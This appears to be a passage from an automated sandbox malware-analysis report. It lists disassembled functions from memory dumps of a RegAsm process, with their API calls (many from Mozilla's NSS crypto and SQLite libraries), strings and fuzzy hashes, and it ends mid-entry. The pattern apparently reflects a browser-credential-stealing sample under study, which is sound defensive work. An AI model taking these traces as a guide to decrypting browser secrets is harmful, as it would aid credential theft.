Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 5d474fbe89a9f2da71c0412103321533cd93a391f3353e232e3e62ab5ca9bf2c
Instruction ID: 5e903ecb00bc94f1272287101bb99409379e17bdf4eec05f317437da39fffe81
Opcode Fuzzy Hash: 5d474fbe89a9f2da71c0412103321533cd93a391f3353e232e3e62ab5ca9bf2c
Instruction Fuzzy Hash: 686171F5E1020A8BEB10CF68D884B9E77F1AF48359F154024EC15A7741EB3AF845CBA1

Function 6C172C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C173F23,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C62
EnterCriticalSection.KERNEL32(0000001C,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C76
PL_HashTableLookup.NSS3(00000000,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172C93

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23,?), ref: 6C172CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?,?,6C173F23), ref: 6C172CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?), ref: 6C172CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C16E477,?,?,?,00000001,00000000,?), ref: 6C172D4D
EnterCriticalSection.KERNEL32(?), ref: 6C172D61
PL_HashTableLookup.NSS3(?,?), ref: 6C172D71
PR_Unlock.NSS3(?), ref: 6C172D7E

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: aa5a8729705f8f5cfb2980f7f0b12c3bd0986688f7fdb7f97e6f93d868b1efbd
Instruction ID: 57495546bc1daf0abfe33a17e8e3fbf325ce8daf2a36e4cd8b4f8bb7e35642a1
Opcode Fuzzy Hash: aa5a8729705f8f5cfb2980f7f0b12c3bd0986688f7fdb7f97e6f93d868b1efbd
Instruction Fuzzy Hash: 1E5127B5D00604EBDB109F24DC489AA77B4FF1925CB048520ED1897B11F731E965CBF1

Function 6C0D4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4D97
PR_Lock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4DBA
PR_WaitCondVar.NSS3 ref: 6C0D4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4DEF

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 69cf2e9534caaa3a9ec5ce9710f71f3668db60f2f95681109275d0c8844d15cb
Instruction ID: f2027631e63cf2c5ed61cb5d21f5aba2773f0f527c6ef8c6aaab51fcf2ef0b8c
Opcode Fuzzy Hash: 69cf2e9534caaa3a9ec5ce9710f71f3668db60f2f95681109275d0c8844d15cb
Instruction Fuzzy Hash: FA416CB1A047559FCB00AFB9D08866DBBF4BF05318F168669DC989B780E730E884CB95

Function 00428A74 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428A8D

Part of subcall function 00423FD2: Sleep.KERNEL32(00000000,?), ref: 00423FFA

__calloc_crt.LIBCMT ref: 00428AB1
_free.LIBCMT ref: 00428ABF
__calloc_crt.LIBCMT ref: 00428ACD
_free.LIBCMT ref: 00428ADD
_free.LIBCMT ref: 00428AE3
__copytlocinfo_nolock.LIBCMT ref: 00428AF2
__setlocale_nolock.LIBCMT ref: 00428AFF
_free.LIBCMT ref: 00428B18
__setmbcp_nolock.LIBCMT ref: 00428B2A
_free.LIBCMT ref: 00428B38
_free.LIBCMT ref: 00428B4C

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 96fd71c0b6790246a9d68f35e8f608ec63da3e1a3b851e7a25f72c42c5facd19
Instruction ID: b41862ae6badfcfc72331a2a9dee1b31afd3d7fe75b2c3b1b387575554db026a
Opcode Fuzzy Hash: 96fd71c0b6790246a9d68f35e8f608ec63da3e1a3b851e7a25f72c42c5facd19
Instruction Fuzzy Hash: 1021F631705620EBE7257F2AF802A4FBBF4DF81754BA1842FF4C866261DE3DA841865D

Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
GetLastError.KERNEL32 ref: 0040160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
GetWindowContextHelpId.USER32(00000000), ref: 0040161B
GetWindowLongW.USER32(00000000,00000000), ref: 00401623
RegisterClassW.USER32(00000000), ref: 0040162A
IsWindowVisible.USER32(00000000), ref: 00401631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
HeapFree.KERNEL32(00000000), ref: 0040165D

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE

Function 6C140600 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 84stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 6C140623
GetLastError.KERNEL32(?,?,?,?,?,6C1405E2), ref: 6C140642
TlsGetValue.KERNEL32(?,?,?,?,?,6C1405E2), ref: 6C14065D
GetLastError.KERNEL32 ref: 6C140678
PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C14068A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C140693
PR_SetErrorText.NSS3(00000000,?), ref: 6C14069D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,332DA51B,?,?,?,?,?,6C1405E2), ref: 6C1406CA
PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C1405E2), ref: 6C1406E6

Strings

error %d, xrefs: 6C140682

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$Last$AddressProcR_snprintfTextValuestrcmpstrlen
String ID: error %d
API String ID: 4000364758-2147592115
Opcode ID: f8b366bbadf853796e58e0db401f0e2f8906f0249bdfe4d9f845ad5689ce37d0
Instruction ID: 07a8f895c3c6b979eef06912f729eae06258e025256c42387c2c82feba288754
Opcode Fuzzy Hash: f8b366bbadf853796e58e0db401f0e2f8906f0249bdfe4d9f845ad5689ce37d0
Instruction Fuzzy Hash: 8E216871E00284ABEB007B3F9C08B6A7775AFB231DF15806CDC0997B91EF319456CAA1

Function 6C19ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C19DE64), ref: 6C19ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C19ED22

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

PL_FreeArenaPool.NSS3(?), ref: 6C19ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C19ED6B
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C19ED38

Part of subcall function 6C0D4C70: TlsGetValue.KERNEL32(?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4C97
Part of subcall function 6C0D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CB0
Part of subcall function 6C0D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C19ED52
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C19ED83
PL_FreeArenaPool.NSS3(?), ref: 6C19ED95
PL_FinishArenaPool.NSS3(?), ref: 6C19ED9D

Part of subcall function 6C1B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C1B127C,00000000,00000000,00000000), ref: 6C1B650E

Strings

security, xrefs: 6C19ED06

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: d0acc6ea1e230675e9de4e6c7a2da106610186db050331a5cc9924ef8537d41f
Instruction ID: 1ed53063f06b84522e228974a8f1a71f17e00a926a3ce35de0c09bb873ff0871
Opcode Fuzzy Hash: d0acc6ea1e230675e9de4e6c7a2da106610186db050331a5cc9924ef8537d41f
Instruction Fuzzy Hash: EC113DB590070C67E6105765EC88BBB72B8BF1160CF050524EC5572E91FB35A60CCAD6

Function 0042656D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00426594
_free.LIBCMT ref: 004265A2
_free.LIBCMT ref: 004265AD
_free.LIBCMT ref: 00426581

Part of subcall function 0041D89B: HeapFree.KERNEL32(00000000,00000000,?,0041D0E7,00000000,0043B6E4,0041D12E,0040EEBE,?,?,0041D218,0043B6E4,?,?,0042EB98,0043B6E4), ref: 0041D8B1
Part of subcall function 0041D89B: GetLastError.KERNEL32(?,?,?,0041D218,0043B6E4,?,?,0042EB98,0043B6E4,?,?,?), ref: 0041D8C3

___free_lc_time.LIBCMT ref: 004265CB
_free.LIBCMT ref: 004265D6
_free.LIBCMT ref: 004265FB
_free.LIBCMT ref: 00426612
_free.LIBCMT ref: 00426621

Strings

xLC, xrefs: 004265BB

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: xLC
API String ID: 3704779436-381350105
Opcode ID: e9ab30ef66d762e5ef5849d71dbe1822e7a1407a49823b6401e9ed35e676bc44
Instruction ID: 93d248000a72deedfa4ed8d070d4272e7131612b2f44b0dba063199fd3c03978
Opcode Fuzzy Hash: e9ab30ef66d762e5ef5849d71dbe1822e7a1407a49823b6401e9ed35e676bc44
Instruction Fuzzy Hash: 3F11B2B2A003119BDB247F64E8C5B9AB395EB41304F91097FF154A7255CB3CA8C0CB18

Function 6C1C4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C1C4DCB

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C1C4DE1

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C1C4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C1C4E59

Part of subcall function 6C1AFAB0: free.MOZGLUE(?,-00000001,?,?,6C14F673,00000000,00000000), ref: 6C1AFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C28300C,00000000), ref: 6C1C4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C1C4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C1C4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1C521A

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: b4c4d6218db50dd79d433a181e1c672c0d7b64d2a52816cd32021fc22625aef0
Instruction ID: b026561794faa1254871895043fab55b3e44b2136d0d483c475276391d9c8070
Opcode Fuzzy Hash: b4c4d6218db50dd79d433a181e1c672c0d7b64d2a52816cd32021fc22625aef0
Instruction Fuzzy Hash: CEF19C71F04209CBDB04CF58D8407AEB7B2BF65318F254169E915AB781E739E981CF92

Function 6C1C0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C1C2C2A), ref: 6C1C0C81

Part of subcall function 6C1ABE30: SECOID_FindOID_Util.NSS3(6C16311B,00000000,?,6C16311B,?), ref: 6C1ABE44

Part of subcall function 6C198500: SECOID_GetAlgorithmTag_Util.NSS3(6C1995DC,00000000,00000000,00000000,?,6C1995DC,00000000,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C198517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1C0CC4

Part of subcall function 6C1AFAB0: free.MOZGLUE(?,-00000001,?,?,6C14F673,00000000,00000000), ref: 6C1AFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1C0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C1C0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C1C0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C1C0D7D
free.MOZGLUE(00000000), ref: 6C1C0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1C0DC1
free.MOZGLUE(00000000), ref: 6C1C0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C1C0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1C0E0F

Part of subcall function 6C1995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C1995E0
Part of subcall function 6C1995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C177F4A,00000000,?,00000000,00000000), ref: 6C1995F5
Part of subcall function 6C1995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C199609
Part of subcall function 6C1995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C19961D
Part of subcall function 6C1995C0: PK11_GetInternalSlot.NSS3 ref: 6C19970B
Part of subcall function 6C1995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C199756
Part of subcall function 6C1995C0: PK11_GetIVLength.NSS3(?), ref: 6C199767
Part of subcall function 6C1995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C19977E
Part of subcall function 6C1995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C19978E

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: a4efb2ecf6bb8bb2434a26e1516fc69efe7fa5f96780d065ad98eba2259b39c4
Instruction ID: 66b94df6f2d9e61c35d15d321fd991e82457883d2c902f716191e193ece82cf9
Opcode Fuzzy Hash: a4efb2ecf6bb8bb2434a26e1516fc69efe7fa5f96780d065ad98eba2259b39c4
Instruction Fuzzy Hash: CD41B2F5A01246ABEB009F64DC45BFF7674AF14308F104124ED1967B41EB39AA18CBE2

Function 6C142D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C142D69

Strings

winUnmapfile1, xrefs: 6C142F55
@&l, xrefs: 6C142E24
winTruncate2, xrefs: 6C142EF8
P&l, xrefs: 6C142E74, 6C142EC5, 6C142F32, 6C142F5C
&l, xrefs: 6C142DD0
winSeekFile, xrefs: 6C142E9C
winUnmapfile2, xrefs: 6C142F7F
winTruncate1, xrefs: 6C142EBE

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
